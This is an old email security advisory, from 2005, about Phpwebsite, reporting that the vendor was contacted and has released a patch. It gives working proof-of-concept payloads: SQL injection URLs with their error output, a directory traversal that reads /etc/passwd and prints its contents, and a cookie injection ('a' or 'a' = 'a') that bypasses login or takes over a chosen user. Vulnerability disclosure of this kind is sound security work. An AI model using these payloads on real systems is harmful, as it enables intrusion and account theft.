This is a multi-part message in MIME format. ------=_NextPart_000_00D1_01C58264.72EAAD10 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Dcrab 's Security Advisory http://www.dbtech.org Deadbolt Computer Technologies Get Dcrab's Services to audit your Web servers, scripts, networks, etc = or even code them. Learn more at http://www.dbtech.org Severity: High Title: Phpwebsite has multiple serious vulnerabilities Date: 7/07/2005 Vendor: Phpwebsite Vendor Website: http://phpwebsite.appstate.edu Vendor Status: Contacted and patch has been released Summary: There are, multiple sql injection, authentication bypass and = directory transversal vulnerabilities in Phpwebsite. Proof of Concept Exploits:=20 www.example.com/phpwebsite/index.php?module=3D'&search_op=3Dsearch&mod=3D= all&query=3D1&search=3DSearch=20 SQL injection DB Error: syntax error SELECT show_block, block_title FROM mod_search WHERE module=3D''' = [nativecode=3D1064 ** You have an error in your SQL syntax. Check the = manual that corresponds to your MySQL server version for the right = syntax to use near ''''' at line 1]=20 www.example.com/phpwebsite/index.php?module=3Dsearch&search_op=3Dsearch&m= od=3D'&query=3D1&search=3DSearch SQL injection DB Error: syntax error SELECT block_title FROM mod_search WHERE module=3D''' [nativecode=3D1064 = ** You have an error in your SQL syntax. Check the manual that = corresponds to your MySQL server version for the right syntax to use = near ''''' at line 1]=20 www.example.com/phpwebsite/index.php?module=3Dsearch&search_op=3Dsearch&m= od=3D../../../../../../../../etc/passwd%00&query=3D1&search=3DSearch Directory traversal root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/bin/bash = daemon:x:2:2:Daemon:/sbin:/bin/bash lp:x:4:7:Printing = daemon:/var/spool/lpd:/bin/bash mail:x:8:12:Mailer = daemon:/var/spool/clientmqueue:/bin/false news:x:9:13:News=20 Log into a user account with remember me checked, then delete all the = cookies beside the one with [mod_users][rememberme] Cookie name: *an md5 hash set by the website* [mod_users][rememberme] Value: a' or 'a' =3D 'a You can also steal specific user accounts by setting the cookie value as = a' or user_id =3D '5' Solution: The vendor's were contacted via email and responded quickly. The issue = was corresponded to them after which a patch was released on their = official website.=20 You can get the security patch at, = http://phpwebsite.appstate.edu/downloads/security/phpwebsite_security_pat= ch_20050705.2.tgz Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah = and at http://www.hackerscenter.com Author:=20 These vulnerabilities have been found and released by Diabolic Crab, = Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to = contact me regarding these vulnerabilities. You can find me at, = http://www.hackerscenter.com or http://www.dbtech.org/. Lookout for my = soon to come out book on Secure coding with php. -------------------------------------------------------------------------= ------- Sincerely,=20 Diabolic Crab=20 ------=_NextPart_000_00D1_01C58264.72EAAD10 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
Dcrab 's Security Advisory
http://www.dbtech.org
Deadbolt = Computer=20 Technologies
 
Get Dcrab's Services to audit your Web = servers,=20 scripts, networks, etc or even code them. Learn more at http://www.dbtech.org
 
Severity: High
Title: Phpwebsite has = multiple=20 serious vulnerabilities
Date: 7/07/2005
 
Vendor: Phpwebsite
Vendor Website: = http://phpwebsite.appstate.edu
Vendor=20 Status: Contacted and patch has been released
Summary: There are, multiple sql = injection,=20 authentication bypass and directory transversal vulnerabilities in=20 Phpwebsite.
 

Proof of Concept Exploits:
 
www.example= .com/phpwebsite/index.php?module=3D'&search_op=3Dsearch&mod=3Dall= &query=3D1&search=3DSearch=20
SQL injection
 
DB Error: syntax error
SELECT show_block, block_title FROM = mod_search=20 WHERE module=3D''' [nativecode=3D1064 ** You have an error in your SQL = syntax. Check=20 the manual that corresponds to your MySQL server version for the right = syntax to=20 use near ''''' at line 1]
 
www.exam= ple.com/phpwebsite/index.php?module=3Dsearch&search_op=3Dsearch&m= od=3D'&query=3D1&search=3DSearch
SQL=20 injection
 
DB Error: syntax error
SELECT block_title FROM mod_search WHERE=20 module=3D''' [nativecode=3D1064 ** You have an error in your SQL syntax. = Check the=20 manual that corresponds to your MySQL server version for the right = syntax to use=20 near ''''' at line 1]
 
www.example.com/phpwebsite/index.php?module=3D= search&search_op=3Dsearch&mod=3D../../../../../../../../etc/passw= d%00&query=3D1&search=3DSearch
Directory=20 traversal
 
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/bin/bash=20 daemon:x:2:2:Daemon:/sbin:/bin/bash lp:x:4:7:Printing=20 daemon:/var/spool/lpd:/bin/bash mail:x:8:12:Mailer=20 daemon:/var/spool/clientmqueue:/bin/false news:x:9:13:News
 
Log into a user account with remember me checked, then delete all = the=20 cookies beside the one with [mod_users][rememberme]
Cookie name: *an = md5 hash=20 set by the website* [mod_users][rememberme]
Value: a' or 'a' =3D = 'a
You can=20 also steal specific user accounts by setting the cookie value as a' or = user_id =3D=20 '5'
 
Solution:
The vendor's were contacted via email and responded quickly. The = issue was=20 corresponded to them after which a patch was released on their official = website.=20
 
You can get the security patch at, http://phpwebsite.appstate.edu/downloads/secur= ity/phpwebsite_security_patch_20050705.2.tgz
 
Keep your self updated, Rss feed at: http://digitalparadox.org/rss.a= h and=20 at http://www.hackerscenter.com
 
Author:
These vulnerabilities have been found and released by = Diabolic=20 Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel = free to=20 contact me regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com = or http://www.dbtech.org/. Lookout for = my soon to=20 come out book on Secure coding with php.

Sincerely,
Diabolic Crab=20




------=_NextPart_000_00D1_01C58264.72EAAD10--